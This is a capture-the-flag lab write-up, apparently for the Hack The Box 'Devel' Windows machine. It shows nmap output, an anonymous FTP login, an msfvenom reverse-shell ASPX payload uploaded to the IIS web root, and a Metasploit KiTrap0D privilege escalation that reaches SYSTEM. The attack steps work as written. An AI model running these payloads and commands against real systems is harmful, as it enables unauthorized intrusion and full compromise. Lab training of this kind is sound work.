OS Windows
IP: 10.10.10.5
Machine Author: ch4p
Nmap:-
root@kali:~/Desktop# nmap -sS -A 10.10.10.5
Starting Nmap 7.50 ( https://nmap.org ) at 2017-12-18 15:47 EST
Nmap scan report for 10.10.10.5
Host is up (0.22s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17 01:06AM aspnet_client
| 03-17-17 04:37PM 689 iisstart.htm
|_03-17-17 04:37PM 184946 welcome.png
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|phone|specialized
Running (JUST GUESSING): Microsoft Windows 8|Phone|2008|8.1|7|Vista|2012 (92%)
OS CPE: cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 cpe:/o:microsoft:windows_server_2012
Aggressive OS guesses: Microsoft Windows 8.1 Update 1 (92%), Microsoft Windows Phone 7.5 or 8.0 (92%), Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 or Windows 8.1 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows Embedded Standard 7 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using port 21/tcp)
HOP RTT ADDRESS
1 283.76 ms 10.10.14.1
2 283.90 ms 10.10.10.5
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 55.06 seconds
Anonymous login in FTP is allowed, which means we can loggin to the FTP server with {anonymous} as a username and password.
root@kali:~/Desktop# ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17 01:06AM aspnet_client
03-17-17 04:37PM 689 iisstart.htm
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
ftp>
Looks like we got the access to the Web-Directory of the server, So now we will generate our payload using msfvenom , As the target server is using IIS 7 so we will need to generate the payload with the extension of (.aspx).
root@kali:~/Desktop# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.*.* LPORT=4455 -b "\x00" -f aspx > teck.aspx
No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No Arch selected, selecting Arch: x86 from the payload
Found 10 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 360 (iteration=0)
x86/shikata_ga_nai chosen with final size 360
Payload size: 360 bytes
Final size of aspx file: 2917 bytes
root@kali:~/Desktop#
Now upload our generated payload into the server using FTP.
ftp> put teck.aspx
local: teck.aspx remote: teck.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2954 bytes sent in 0.00 secs (12.4653 MB/s)
ftp> ls
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17 01:06AM aspnet_client
03-17-17 04:37PM 689 iisstart.htm
12-22-17 07:35AM 2907 teck.aspx
03-17-17 04:37PM 184946 welcome.png
226 Transfer complete.
ftp>
The file has been uploaded, now to get the reverse shell first open the multi handler listner in MSF and then browse the file {http://10.10.10.5/teck.aspx}.
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 10.10.*.*
LHOST => 10.10.14.14
msf exploit(handler) > set LPORT 4455
LPORT => 4455
msf exploit(handler) > exploit
[*] Started reverse TCP handler on 10.10.*.*:4455
[*] Starting the payload handler...
[*] Sending stage (957487 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.*.*:4455 -> 10.10.10.5:49158) at 2017-12-18 17:27:04 -0500
meterpreter > getuid
Server username: IIS APPPOOL\Web
meterpreter >run post/windows/manage/migrate
[*] Running module against DEVEL
[*] Current server process: w3wp.exe (1132)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 264
[+] Successfully migrated to process 264
meterpreter >
We got the web Meterpreter session, run the post migrate command or the meterpreter session will be close after 5 min. Now in able to read the flag first we need to Escalate our Privilege.
Privilege Escalation Exploit:- Windows SYSTEM Escalation via KiTrap0D
Vulnerabilty Description:- This module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.
POC:-
meterpreter > background
[*] Backgrounding session 3...
msf exploit(handler) > use exploit/windows/local/ms10_015_kitrap0d
msf exploit(ms10_015_kitrap0d) > set SESSION 3
SESSION => 3
msf exploit(ms10_015_kitrap0d) > set LHOST 10.10.*.*
LHOST => 10.10.*.*
msf exploit(ms10_015_kitrap0d) > set LPORT 444
LPORT => 444
msf exploit(ms10_015_kitrap0d) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_015_kitrap0d) > exploit
[*] Started reverse TCP handler on 10.10.*.*:444
[*] Launching notepad to host the exploit...
[+] Process 1376 launched.
[*] Reflectively injecting the exploit DLL into 1376...
[*] Injecting exploit into 1376 ...
[*] Exploit injected. Injecting payload into 1376...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (957487 bytes) to 10.10.10.5
[*] Meterpreter session 4 opened (10.10.*.*:444 -> 10.10.10.5:49158) at 2017-12-18 18:01:20 -0500
meterpreter >getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Flags:-
c:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
*************************
c:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
*************************
c:\Users\Administrator\Desktop>
Twitter / Hack The Box / CTF Team / Teck_N00bs Community Telegram
Comments